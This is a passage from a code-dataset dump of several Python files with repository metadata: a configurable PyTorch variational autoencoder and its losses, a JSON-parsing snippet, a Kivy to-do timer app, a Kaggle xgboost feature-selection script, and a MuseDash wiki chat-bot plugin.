self.decoding_act = F.leaky_relu\n\n def encode(self, x):\n m, l = self.encode_(x)\n if self.training:\n return self.reparametrize(m, l)\n else:\n return m\n \n def encode_(self, x):\n x = self.encoding_act(self.encoding_layer_0(x))\n mu = self.encoding_mu(x)\n logvar = self.encoding_logvar(x)\n return mu, logvar\n\n def reparametrize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n\n def decode(self, x):\n x = self.decoding_act(self.decoding_layer_0(x))\n mu = self.decoding_layer_mu(x)\n logvar = self.decoding_layer_logvar(x)\n return mu, logvar\n\n def forward(self, x):\n mu_latent, logvar_latent = self.encode_(x)\n z = self.reparametrize(mu_latent, logvar_latent)\n mu_x, logvar_x = self.decode(z)\n if self.training:\n x_out = self.reparametrize(mu_x, logvar_x)\n else:\n x_out = mu_x\n return x_out, {\"mu_latent\" : mu_latent, \"logvar_latent\" : logvar_latent,\n \"mu_x\" : mu_x, \"logvar_x\" : logvar_x}\n\n\ndef tuple_product(t):\n return reduce(lambda x, y: x * y, t, 1)\n \n@dataclass\nclass ConvSpec1D:\n # convolution\n channels : int = 1\n kernel : int = 2\n stride : int = 1\n dilation : int = 1\n # batch_norm\n batch_norm : bool = False\n # activation\n activation : callable = torch.nn.Identity\n _reverse_activation: callable = None\n\n @property\n def reverse_activation(self):\n if self._reverse_activation is not None:\n return 
self._reverse_activation\n else:\n return self.activation\n \n \n \n@dataclass\nclass LinearSpec:\n size : [int, float] = 0.5\n # batch_norm\n dropout : bool = False\n batch_norm : bool = False\n # activation\n activation : callable = torch.nn.Identity\n _reverse_activation: callable = None\n\n @property\n def reverse_activation(self):\n if self._reverse_activation is not None:\n return self._reverse_activation\n else:\n return self.activation\n\nclass ReshapeView(nn.Module):\n def __init__(self, shape):\n super(ReshapeView, self).__init__()\n self._shape = shape\n\n def forward(self, x):\n return x.view(-1, *self._shape)\n \n def extra_repr(self) -> str:\n return f'reshape to [B, {self._shape}]'\n\n \n\nclass UberVAE(nn.Module):\n def __init__(self,\n feature_dims : int = 10, latent_dim : int = 64,\n n_conv_layers_1d : List[ConvSpec1D] = None,\n n_linear_layers : List[LinearSpec] = None,\n distributive_latent=True, distributive_recon=False,\n output_mu=True, logloss2sigmoid=False,\n #latent_activation=None, final_activation=False, # TODO!\n ):\n super(UberVAE, self).__init__()\n self._conv_encoder = torch.nn.Identity()\n self._conv_decoder = torch.nn.Identity()\n\n self._lin_encoder = torch.nn.Identity()\n self._lin_decoder = torch.nn.Identity()\n\n self._feature_dims = feature_dims\n self._flatten_input = False\n self._blowup_channels = False\n self._conv_interface_shape = None\n self._conv_interface_size = None\n self._latent_interface_size = feature_dims\n self._latent_size = latent_dim\n\n # behavioral parameters\n self._distributive_latent = distributive_latent\n self._distributive_recon = distributive_recon\n self._output_mu = output_mu\n self._logloss2sigmoid = logloss2sigmoid\n\n conv_encoding_layers = []\n conv_decoding_layers = []\n deconv_channel_sizes = []\n deconv_output_sizes = []\n last_conv_decoding_layer_idx = 0\n if n_conv_layers_1d:\n self._blowup_channels = True\n if isinstance(feature_dims, tuple):\n self._blowup_channels = False\n conv_inchannels = feature_dims[0]\n conv_prev_output_dims = [feature_dims]\n else:\n conv_encoding_layers.append(ReshapeView((1, feature_dims)))\n conv_inchannels = 1\n conv_prev_output_dims = [(1, feature_dims,)]\n\n conv_channel_sizes = [conv_inchannels] + \\\n [(cspec.channels) for cspec in n_conv_layers_1d]\n\n for conv_idx in range(len(n_conv_layers_1d)):\n cspec = n_conv_layers_1d[conv_idx]\n conv_part = torch.nn.Conv1d(conv_channel_sizes[conv_idx],\n cspec.channels, cspec.kernel,\n stride=cspec.stride, dilation=cspec.dilation)\n sample_batch = conv_part(torch.rand(1, *(conv_prev_output_dims[conv_idx])))\n conv_encoding_layers.append(conv_part)\n conv_prev_output_dims.append(tuple(sample_batch.shape[1:]))\n if cspec.batch_norm:\n conv_encoding_layers.append(torch.nn.BatchNorm1d(sample_batch.shape[1]))\n conv_encoding_layers.append(cspec.activation())\n conv_encoding_layers.append(torch.nn.Flatten())\n\n print(\"convolution outputs \", \"-\".join([str(x) for x in conv_prev_output_dims])) \n \n self._conv_interface_shape = tuple(conv_prev_output_dims[-1])\n self._conv_interface_size = tuple_product(self._conv_interface_shape)\n self._latent_interface_size = self._conv_interface_size\n\n deconv_channel_sizes = list(reversed(conv_prev_output_dims))\n deconv_layers1d = list(reversed(n_conv_layers_1d))\n \n conv_decoding_layers.append(ReshapeView(self._conv_interface_shape))\n for dc_idx in range(len(deconv_layers1d)):\n last_conv_decoding_layer_idx = len(conv_decoding_layers)\n cspec = deconv_layers1d[dc_idx]\n output_shape = (0, 0)\n 
deconv_part = None\n out_padding = 0\n for i in range(2):\n deconv_part = torch.nn.ConvTranspose1d(\n cspec.channels, deconv_channel_sizes[dc_idx+1][0], cspec.kernel,\n stride=cspec.stride, dilation=cspec.dilation,\n output_padding=out_padding)\n sample_batch = deconv_part(torch.rand(1, *deconv_channel_sizes[dc_idx]))\n output_shape = sample_batch.shape\n if output_shape[-1] != deconv_channel_sizes[dc_idx+1][-1]:\n out_padding = deconv_channel_sizes[dc_idx+1][-1]-output_shape[-1]\n else:\n break\n deconv_output_sizes.append(output_shape)\n conv_decoding_layers.append(deconv_part)\n if cspec.batch_norm:\n conv_decoding_layers.append(torch.nn.BatchNorm1d(output_shape[0]))\n conv_decoding_layers.append(cspec.reverse_activation())\n\n if self._blowup_channels:\n conv_decoding_layers.append(ReshapeView((feature_dims,)))\n\n lin_encoding_layers = []\n lin_decoding_layers = []\n lin_layer_upsizes = []\n last_decoding_layer_idx = 0\n if n_linear_layers:\n if not n_conv_layers_1d and isinstance(feature_dims, tuple):\n self._flatten_input = True\n lin_input = tuple_product(feature_dims)\n lin_encoding_layers.append(torch.nn.Flatten())\n elif n_conv_layers_1d:\n lin_input = self._conv_interface_size\n else:\n lin_input = feature_dims\n\n lin_layer_insizes = [lin_input,] + \\\n [int(lspec.size*self._latent_interface_size) if isinstance(lspec.size, float) else lspec.size\n for lspec in n_linear_layers]\n\n for lin_idx in range(len(n_linear_layers)):\n lspec = n_linear_layers[lin_idx]\n if lspec.dropout:\n raise NotImplementedError\n lin_layer = torch.nn.Linear(lin_layer_insizes[lin_idx],\n lin_layer_insizes[lin_idx+1])\n lin_encoding_layers.append(lin_layer)\n if lspec.batch_norm:\n lin_encoding_layers.append(torch.nn.BatchNorm1d(lin_layer_insizes[lin_idx+1]))\n lin_encoding_layers.append(lspec.activation())\n\n self._latent_interface_size = lin_layer_insizes[-1]\n\n lin_layer_upsizes = list(reversed(lin_layer_insizes))\n lin_layers_up = list(reversed(n_linear_layers))\n\n for rlin_idx in range(len(lin_layers_up)):\n last_decoding_layer_idx = len(lin_decoding_layers)\n lspec = lin_layers_up[rlin_idx]\n lin_layer = torch.nn.Linear(lin_layer_upsizes[rlin_idx], lin_layer_upsizes[rlin_idx+1])\n lin_decoding_layers.append(lin_layer)\n if lspec.batch_norm:\n lin_decoding_layers.append(torch.nn.BatchNorm1d(\n lin_layer_upsizes[rlin_idx+1]))\n lin_decoding_layers.append(lspec.reverse_activation())\n\n if self._flatten_input:\n lin_decoding_layers.append(ReshapeView(feature_dims))\n \n\n if isinstance(self._feature_dims, tuple) and (not n_conv_layers_1d) and not(n_linear_layers):\n self._mu_latent = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tuple_product(self._feature_dims), self._latent_size)\n )\n self._logvar_latent = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tuple_product(self._feature_dims), self._latent_size)\n )\n \n else:\n self._mu_latent = torch.nn.Linear(self._latent_interface_size, self._latent_size)\n self._logvar_latent = torch.nn.Linear(self._latent_interface_size, self._latent_size)\n\n\n if isinstance(self._feature_dims, tuple) and (not n_conv_layers_1d) and not(n_linear_layers):\n self._mu_x = torch.nn.Sequential(\n torch.nn.Linear(self._latent_size, tuple_product(self._feature_dims)),\n ReshapeView(self._feature_dims)\n )\n self._logvar_x = torch.nn.Sequential(\n torch.nn.Linear(self._latent_size, tuple_product(self._feature_dims)),\n ReshapeView(self._feature_dims)\n )\n elif (not n_conv_layers_1d) and not(n_linear_layers):\n self._mu_x = 
torch.nn.Linear(self._latent_size, self._feature_dims)\n self._logvar_x = torch.nn.Linear(self._latent_size, self._feature_dims)\n else:\n self._mu_x = None\n self._logvar_x = None\n\n\n if conv_encoding_layers:\n self._conv_encoder = torch.nn.Sequential(*conv_encoding_layers)\n if lin_encoding_layers:\n self._conv_decoder = torch.nn.Sequential(*conv_decoding_layers[:last_conv_decoding_layer_idx])\n else:\n self._conv_decoder = torch.nn.Sequential(\n torch.nn.Linear(self._latent_size, self._latent_interface_size),\n *conv_decoding_layers[:last_conv_decoding_layer_idx])\n self._mu_x = torch.nn.Sequential(*conv_decoding_layers[last_conv_decoding_layer_idx:])\n #print(deconv_channel_sizes)\n if self._blowup_channels:\n self._logvar_x = torch.nn.Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(tuple_product(deconv_channel_sizes[len(n_conv_layers_1d)-1]),\n self._feature_dims),\n torch.nn.Tanh()\n )\n else:\n self._logvar_x = torch.nn.Sequential(\n torch.nn.Linear(deconv_channel_sizes[len(n_conv_layers_1d)-1][-1],\n self._feature_dims[-1]),\n torch.nn.Tanh()\n )\n\n if lin_encoding_layers:\n self._lin_encoder = torch.nn.Sequential(*lin_encoding_layers)\n if conv_encoding_layers:\n self._lin_decoder = torch.nn.Sequential(\n torch.nn.Linear(self._latent_size, self._latent_interface_size),\n *lin_decoding_layers)\n #print(lin_layer_upsizes)\n else:\n self._lin_decoder = torch.nn.Sequential(\n torch.nn.Linear(self._latent_size, self._latent_interface_size),\n *lin_decoding_layers[:last_decoding_layer_idx])\n self._mu_x = torch.nn.Sequential(*lin_decoding_layers[last_decoding_layer_idx:])\n if not self._flatten_input:\n self._logvar_x = torch.nn.Sequential(\n torch.nn.Linear(lin_layer_upsizes[len(n_linear_layers)-1],\n self._feature_dims),\n torch.nn.Tanh()\n )\n else:\n self._logvar_x = torch.nn.Sequential(\n torch.nn.Linear(lin_layer_upsizes[len(n_linear_layers)-1],\n tuple_product(self._feature_dims)),\n torch.nn.Tanh(),\n ReshapeView(self._feature_dims)\n )\n\n\n def reparametrize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n\n def encode(self, x):\n m, l = self.encode_(x)\n if self.training and self._distributive_latent:\n latent = self.reparametrize(m, l)\n elif self._distributive_latent and not self._output_mu:\n latent = self.reparametrize(m, l)\n else:\n latent = m\n return latent\n \n def encode_(self, x):\n x = self._conv_encoder(x)\n x = self._lin_encoder(x)\n mu = self._mu_latent(x)\n logvar = self._logvar_latent(x)\n return mu, logvar\n\n def decode_(self, x):\n x = self._lin_decoder(x)\n x = self._conv_decoder(x)\n mu = self._mu_x(x)\n logvar = self._logvar_x(x)\n return mu, logvar\n\n def forward(self, x):\n mu_latent, logvar_latent = self.encode_(x)\n if self.training and self._distributive_latent:\n latent = self.reparametrize(mu_latent, logvar_latent)\n elif self._distributive_latent and not self._output_mu:\n latent = self.reparametrize(mu_latent, logvar_latent)\n else:\n latent = mu_latent\n\n mu_x, logvar_x = self.decode_(latent)\n if self.training and self._distributive_recon:\n x_out = self.reparametrize(mu_x, logvar_x)\n elif self._distributive_latent and not self._output_mu:\n x_out = self.reparametrize(mu_x, logvar_x)\n else:\n x_out = mu_x\n \n return x_out, {\"mu_latent\" : mu_latent, \"logvar_latent\" : logvar_latent,\n \"mu_x\" : mu_x, \"logvar_x\" : logvar_x}\n\n def add_variational_latent(self, size, lock=False):\n pass\n\n\n\ndef kld(mu, logvar):\n kld = -0.5 * torch.sum(1 + logvar\n - mu.pow(2)\n - 
logvar.exp(), axis=1)\n return kld\n\n\ndef vae_loss(recon_x, tru_x, beta=1, **kwargs):\n # full vae loss for modeling a distributive latent space\n # AND a distributive reconstruction\n # correct formulation here:\n mu_latent = kwargs[\"mu_latent\"]\n logvar_latent = kwargs[\"logvar_latent\"]\n mu_x = kwargs[\"mu_x\"]\n logvar_x = kwargs[\"logvar_x\"]\n\n loss_rec = -torch.sum(\n (-0.5 * torch.log2(TORCH_PI.to(mu_x.device)*2))\n + (-0.5 * logvar_x)\n + ((-0.5 / torch.exp(logvar_x))\n * (tru_x - mu_x) ** 2.0),\n axis=1\n )\n\n KLD = beta * kld(mu_latent, logvar_latent)\n loss = torch.mean(loss_rec + KLD, dim=0)\n return loss\n\ndef vae_loss_cnguyen(recon_x, tru_x, beta=1, **kwargs):\n # full vae loss for modeling a distributive latent space\n # AND a reconstruction with a simple error estimate.\n # https://cnguyen10.github.io/2020/11/24/vae-normalizing-constant-matters.html\n pass\n\ndef naive_vae_loss(recon_x, tru_x, beta=1, **kwargs):\n mu_latent = kwargs[\"mu_latent\"]\n logvar_latent = kwargs[\"logvar_latent\"]\n mu_x = kwargs[\"mu_x\"]\n logvar_x = kwargs[\"logvar_x\"]\n\n loss_rec = F.mse_loss(mu_x, tru_x, reduction='mean')\n\n KLD = beta * kld(mu_latent, logvar_latent)\n loss = torch.mean(loss_rec + KLD, dim=0)\n return loss\n\ndef cont_bernoulli_vae_loss(recon_x, tru_x, beta=1, **kwargs):\n # vae loss for continouus [0,1]-variables\n pass\n\ndef plain_mse(recon_x, tru_x, **kwargs):\n loss_rec = F.mse_loss(recon_x, tru_x, reduction='mean')\n return loss_rec\n\ndef ortho_loss(recon_x, tru_x, **kwargs):\n latent = kwargs[\"latent\"]\n \n","repo_name":"flxmr-tum/sne_materials_surrogate","sub_path":"torch_tools/pytorch_models/simple_aes.py","file_name":"simple_aes.py","file_ext":"py","file_size_in_byte":21652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27171102224","text":"\nimport json\nperson = '{\"c\": 310.13, \"h\": 310.29, \"l\": 304.29, \"o\": 305.64, \"pc\": 303.74, \"t\": 1589083003}'\nperson_dict = json.loads(person)\n\n# Output: {'name': 'Bob', 'languages': ['English', 'Fench']}\nprint(person_dict)\n\n# Output: ['English', 'French']\nprint(person_dict['l'])\n","repo_name":"cartha353/Playground","sub_path":"TestPrograms/python/jsonparsing.py","file_name":"jsonparsing.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71292006243","text":"from kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import ObjectProperty\nfrom kivy.uix.listview import ListItemButton\nfrom kivy.core.window import Window\nfrom kivy.properties import StringProperty\nfrom kivy.clock import Clock\n\nfrom datetime import datetime, timedelta\n\nWindow.size = (500, 400)\n\nclass ToDoListItem(BoxLayout):\n btn_text = StringProperty()\n timer_text = StringProperty()\n elapsed = 0\n\n def update(self, dt):\n\n sec = timedelta(self.elapsed)\n d = datetime(1, 1, 1) + sec\n\n time_str = \"%02d:%02d:%02d:%02d\" % (d.second, d.minute, d.hour, d.day - 1)\n self.timer_text = time_str\n self.elapsed+=1\n\n def onClick(self):\n event = Clock.schedule_interval(self.update, 1)\n #event_trig = Clock.create_trigger(self.update, 1)\n if self.btn_text == \"Start\":\n self.btn_text = \"Stop\"\n #event_trig()\n else:\n self.btn_text = \"Start\"\n event.cancel()\n\nclass ToDoLayout(BoxLayout):\n\n def sort(self):\n self.rv.data = sorted(self.rv.data, key=lambda x: x['value'])\n\n def clear(self):\n self.rv.data = []\n\n def 
insert(self, value):\n self.rv.data.insert(0, {'item_text': value or 'default value'})\n\n def update(self, value):\n if self.rv.data:\n self.rv.data[0]['value'] = value or 'default new value'\n self.rv.refresh_from_data()\n\n def remove(self):\n if self.rv.data:\n self.rv.data.pop(0)\n\nclass ToDoApp(App):\n def build(self):\n return ToDoLayout()\n\ntd = ToDoApp()\ntd.run()","repo_name":"caiyzik/todolist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2530616205","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport xgboost as xgb\nfrom sklearn.cross_validation import StratifiedKFold\nfrom sklearn.cross_validation import cross_val_score\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.feature_selection import SelectFromModel, VarianceThreshold\nimport xgboost as xgb\nfrom sklearn.cross_validation import KFold\nfrom sklearn.linear_model import LogisticRegression\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nfrom subprocess import check_output\nprint(check_output([\"ls\", \"../input\"]).decode(\"utf8\"))\n\n# Any results you write to the current directory are saved as output.\n\nprint('Load data...')\ntrain = pd.read_csv(\"../input/train.csv\")\ntrain_id = train['ID'].values\ntarget = train['TARGET'].values\ntrain = train.drop(['ID','TARGET'],axis=1)\n\ntest = pd.read_csv(\"../input/test.csv\")\ntest_id = test['ID'].values\ntest = test.drop(['ID'],axis=1)\n\n#removing outliers\ntrain = train.replace(-999999,2)\ntest = test.replace(-999999,2)\n\n# adding zero counts\n\ntrain[\"zeroes\"] = (train == 0).astype(int).sum(axis=1)\ntest[\"zeroes\"] = (test == 0).astype(int).sum(axis=1)\n\n# remove constant columns (std = 0)\nremove = []\nfor col in train.columns:\n if train[col].std() == 0:\n remove.append(col)\n\ntrain.drop(remove, axis=1, inplace=True)\ntest.drop(remove, axis=1, inplace=True)\n\nprint(train.shape, test.shape)\n\n# remove duplicated columns\nremove = []\ncols = train.columns\nfor i in range(len(cols)-1):\n v = train[cols[i]].values\n for j in range(i+1,len(cols)):\n if np.array_equal(v,train[cols[j]].values):\n remove.append(cols[j])\n\ntrain.drop(remove, axis=1, inplace=True)\ntest.drop(remove, axis=1, inplace=True)\n\n\n# Feature selection \n#ROUND ONE\nCols = train.columns.values.tolist()\nclf = GradientBoostingClassifier(random_state=1729)\nselector = clf.fit(train, target)\nimportances = selector.feature_importances_\nfs = SelectFromModel(selector, prefit=True)\ntrain = fs.transform(train)\ntest = fs.transform(test)\nprint(train.shape, test.shape)\n\nselectedCols = train.shape[1]\nsortedCols = [col for importance, col in sorted(zip(importances, Cols))]\nsortedCols = sortedCols[0:selectedCols]\ntrain = pd.DataFrame(train)\ntest = pd.DataFrame(test)\ntrain.columns = sortedCols\ntest.columns = sortedCols\n\n#Selecting Percentile Changes from feature to feature\n\nfor i in range(len(sortedCols)):\n\tfor j in 
range(len(sortedCols)):\n\t\tcolName = sortedCols[i]+\"_SUBTRACT_\"+sortedCols[j]+\"DIVIDE\"+sortedCols[i]\n\t\ttrain[colName] = (train[sortedCols[i]]-train[sortedCols[j]])/train[sortedCols[i]]\n\t\ttest[colName] = (test[sortedCols[i]]-test[sortedCols[j]])/test[sortedCols[i]]\n\ntrain = train.replace(np.inf, 999999)\ntrain = train.replace(-np.inf, -999999)\ntrain = train.replace(np.nan, -1)\ntest = test.replace(np.inf, 999999)\ntest = test.replace(-np.inf, -999999)\ntest = test.replace(np.nan, -1)\n\n#ROUND TWO\nCols = train.columns.values.tolist()\nclf = GradientBoostingClassifier(random_state=1729)\nselector = clf.fit(train, target)\nimportances = selector.feature_importances_\nfs = SelectFromModel(selector, prefit=True)\ntrain = fs.transform(train)\ntest = fs.transform(test)\nprint(train.shape, test.shape)\n\nselectedCols = train.shape[1]\nsortedCols = [col for importance, col in sorted(zip(importances, Cols))]\nsortedCols = sortedCols[0:selectedCols]\nprint(sortedCols)\n\npredictedResult = np.zeros(train.shape[0])\nkf = KFold(train.shape[0], n_folds=10)\ntestPred = []\nfor trainIndex, testIndex in kf:\n trainFold, testFold = train[trainIndex], train[testIndex]\n trainFoldTarget, testFoldTarget = target[trainIndex], target[testIndex]\n xgbc = xgb.XGBClassifier(n_estimators = 560,learning_rate = 0.0202047,max_depth = 5,subsample = 0.6815,colsample_bytree = 0.701)\n xgbc.fit(trainFold,trainFoldTarget)\n xgbpred =xgbc.predict_proba(testFold)[:,1]\n testPred.append(xgbc.predict_proba(test)[:,1])\n predictedResult[testIndex] = xgbpred\n print(roc_auc_score(testFoldTarget, xgbpred))\n\nprint(roc_auc_score(target, predictedResult))\ntestPred = np.average(np.array(testPred), axis =0)\npd.DataFrame({\"ID\": test_id, \"TARGET\": testPred}).to_csv('submission.csv',index=False)","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/santander-customer-satisfaction/pip install kaggle/14th-place-private-lb-script.py","file_name":"14th-place-private-lb-script.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"6269326158","text":"# -*- coding: utf-8 -*-\nfrom time import time\nimport requests, asyncio, os, time, random\nfrom datetime import datetime\nimport pytz\nimport hoshino\nfrom hoshino import Service, priv, aiorequests, R\nfrom hoshino.typing import CQEvent, MessageSegment\nfrom hoshino.util import FreqLimiter, escape, DailyNumberLimiter\nfrom operator import __iadd__\n\nfrom . 
import _chip_data, _song_data\n\ntz = pytz.timezone('Asia/Shanghai')\n\n_max = 1\n_nlmt = DailyNumberLimiter(_max)\n\n\nWiki_Menu_Character_img = R.img(f\"musewiki/etc/muses.png\").cqcode\nWiki_Menu_Chip_img = R.img(f\"musewiki/etc/eflins.png\").cqcode\n\ntips_tuple = _song_data.Muse_Tips\n\nsv_help = '''\n ※MuseDash百科※\n当前菜单有以下内容:\n -角色&精灵查询-\n- [查询角色] 查询游戏内角色\n- [查询精灵] 查询游戏内精灵\n\n或发送以下指令进入其它菜单:\n- [帮助百科资料查询]\n- [帮助百科插图查询]\n- [帮助百科成就查询]\n- [帮助百科语音查询]\n- [帮助帮助md百科]\n- [帮助百科歌曲推送]\n- [帮助百科运势]\n'''.strip()\n\nsv = Service(\n name = 'MuseDash百��-角色查询', #功能名\n use_priv = priv.NORMAL, #使用权限 \n manage_priv = priv.ADMIN, #管理权限\n visible = True, #False隐藏\n enable_on_default = True, #是否默认启用\n bundle = 'musedash', #属于哪一类\n help_ = sv_help #帮助文本\n )\n\ndef get_voice_character_menu():\n filename = 'ElfinsBgm.wav'\n voice_rec = R.get('record/musewiki/audioclip/', filename)\n return voice_rec\n\n@sv.on_fullmatch([\"帮助MuseDash百科-角色查询\", \"帮助百科角色查询\"])\nasync def bangzhu_musewiki_chip(bot, ev) -> MessageSegment:\n file = get_voice_character_menu()\n voice_rec = MessageSegment.record(f'file:///{os.path.abspath(file.path)}')\n uid = ev['user_id']\n now_hour=datetime.now(tz).hour\n if 0<=now_hour<6: #凌晨\n tips = random.choice(tips_tuple)\n greetings = '(。・∀・)ノ゙凌晨好!'\n await bot.send(ev, greetings + tips)\n elif 8<=now_hour<12: #上午\n tips = random.choice(tips_tuple)\n greetings = '(((o(*゚▽゚*)o)))上午好!'\n await bot.send(ev, greetings + tips)\n elif 12<=now_hour<14: #中午\n tips = random.choice(tips_tuple)\n greetings = '(o゜▽゜)o☆中午好!'\n await bot.send(ev, greetings + tips)\n elif 14<=now_hour<18: #下午\n tips = random.choice(tips_tuple)\n greetings = 'o(^▽^)o下午好!'\n await bot.send(ev, greetings + tips)\n elif 18<=now_hour<21: #晚上\n tips = random.choice(tips_tuple)\n greetings = '♪(´∇`*)晚上好!'\n await bot.send(ev, greetings + tips)\n elif 21<=now_hour<24: #深夜\n tips = random.choice(tips_tuple)\n greetings = '✧(≖ ◡ ≖✿)深夜好!'\n if not _nlmt.check(uid):\n await bot.send(ev, f\"欢迎继续使用MuseDash百科-角色查询!\")\n else:\n await bot.send(ev, voice_rec)\n _nlmt.increase(uid)\n\n final_output = Wiki_Menu_Character_img + sv_help\n await bot.send(ev, final_output)\n\n# No.: [name, description, skill, chipname, chipdescription]\nasync def get_chip_info_from_chip(chip):\n chip_data = _chip_data.CHIP_DATA[chip]\n Name = chip_data[0] #获取精灵名称\n DESCRIPTION = chip_data[1] #获取精灵描述\n SKILL = chip_data[2] #获取技能\n CHIPNAME = chip_data[3] #获取信物\n CHIPDESCRIPTION = chip_data[4] #获取信物描述\n\n chippic = R.img(f\"musewiki/chip/chip_pic/{Name}.png\").cqcode\n chipgood = R.img(f\"musewiki/chip/chip_goods/{CHIPNAME}.png\").cqcode\n\n chip_image_cover = str(chippic)\n chip_goods_image = str(chipgood)\n\n chip_info_1 = f\"精灵名:{Name}\\n精灵描述:{DESCRIPTION}\\n技能:{SKILL}\\n\"\n chip_info_2 = f\"信物:{CHIPNAME}\\n信物描述:{CHIPDESCRIPTION}\"\n\n return chip_info_1, chip_image_cover, chip_info_2, chip_goods_image, chip_data\n\ndef keyword_search_chip(keyword):\n chip_dict = _chip_data.CHIP_DATA\n result = []\n for chip in chip_dict:\n if keyword in chip_dict[chip][0] or keyword in chip:\n result.append(chip)\n return result\n\n@sv.on_prefix(('查询精灵'))\nasync def muse_wiki_chip(bot, ev: CQEvent):\n show_chips = str(Wiki_Menu_Chip_img)\n s = ev.message.extract_plain_text()\n if not s:\n await bot.send(ev, \"请发送[查询精灵 精灵名]~\\n精灵名需要完整匹配\", at_sender=True)\n return\n if s:\n available_chips = keyword_search_chip(s)\n if not available_chips:\n await bot.send(ev, f'未找到含有关键词\"{s}\"的精灵...')\n return\n elif len(available_chips) > 1:\n msg_part = '\\n'.join(['• ' + chip for chip in 
available_chips])\n await bot.send(ev, f'从资料库中找到了这些:\\n{msg_part}\\n您想找的是什么呢~')\n return\n else:\n chip_info_1, chip_image_cover, chip_info_2, chip_goods_image, chip_data = await get_chip_info_from_chip(available_chips[0])\n\n final_msg = show_chips + '\\n' + chip_image_cover + chip_info_1 + chip_goods_image + chip_info_2 #合成单条消息\n await bot.send(ev, final_msg)\n\n# Name: [cosName, character, HP, description, skill, chipName, chipDescription, cv]\nasync def get_chara_info_from_chara(chara):\n chara_data = _chip_data.CHARA_DATA[chara]\n cosName = chara_data[0] #获取皮肤名称\n character = chara_data[1] #获取角色名\n HP = chara_data[2] #获取血量\n description = chara_data[3] #获取描述\n skill = chara_data[4] #获取技能\n charaName =chara_data[5] #获取信物\n chipDescription =chara_data[6] #获取信物描述\n cv =chara_data[7] #获取声优\n\n charapic = R.img(f\"musewiki/chip/chara_pic/{cosName}.png\").cqcode\n charagood = R.img(f\"musewiki/chip/chara_goods/{charaName}.png\").cqcode\n chara_bgm = f'[CQ:record,file=file:///C:/Resources/record/musewiki/角色语音/bgm/{cosName}.wav]'\n\n chara_image = str(charapic)\n chara_goods_image = str(charagood)\n\n \n\n chara_info_1 = f\"角色名:{cosName}{character}\\n初始血量:{HP}\\n角色描述:{description}\\n技能: {skill}\\n\"\n chara_info_2 = f\"信物:{charaName}\\n信物描述:{chipDescription}\\n声优: {cv}\"\n\n return chara_info_1, chara_image, chara_info_2, chara_goods_image, chara_data, chara_bgm\n\ndef keyword_search_chara(keyword):\n chara_dict = _chip_data.CHARA_DATA\n result = []\n for chara in chara_dict:\n if keyword in chara or keyword in chara_dict[chara][0]:\n result.append(chara)\n return result\n\n@sv.on_prefix(('查询角色'))\nasync def muse_wiki_chara(bot, ev: CQEvent):\n s = ev.message.extract_plain_text()\n if not s:\n await bot.send(ev, \"不告诉我名字要怎么查询啦!\")\n return\n if s:\n available_charas = keyword_search_chara(s)\n if not available_charas:\n await bot.send(ev, f'没有找到叫\"{s}\"的角色哦')\n return\n elif len(available_charas) > 1:\n msg_part = '\\n'.join(['• ' + chara for chara in available_charas])\n await bot.send(ev, f'好像有很多相似的名字哦~:\\n{msg_part}\\n您想找的是谁呢~')\n return\n else:\n chara_info_1, chara_image, chara_info_2, chara_goods_image, chara_data, chara_bgm = await get_chara_info_from_chara(available_charas[0])\n\n final_msg = chara_image + chara_info_1 + chara_goods_image + chara_info_2 #合成单条消息\n await bot.send(ev, final_msg)\n await bot.send(ev, chara_bgm)","repo_name":"Soung2279/haru-bot-setup","sub_path":"hoshino/modules/musedash/musewiki_character.py","file_name":"musewiki_character.py","file_ext":"py","file_size_in_byte":7583,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"54"} +{"seq_id":"72999008483","text":"import pygame\n\n\nclass Bar:\n def __init__(self):\n self.x = 600\n self.y = 700\n self.width = 100\n self.height = 30\n self.vel = 30\n self.color = (225, 0, 0)\n self.moving_right = False\n self.moving_left = False\n\n def draw_bar(self, screen):\n pygame.draw.rect(screen, self.color, (self.x, self.y, self.width, self.height))\n\n def update_bar(self, screen_width):\n if self.moving_right and self.x < screen_width - self.width:\n self.x += self.vel\n elif self.moving_left and self.x > 0:\n self.x -= self.vel\n","repo_name":"FruitPunchSamurai1961/Breakout_Game","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16874142806","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport io\nimport 
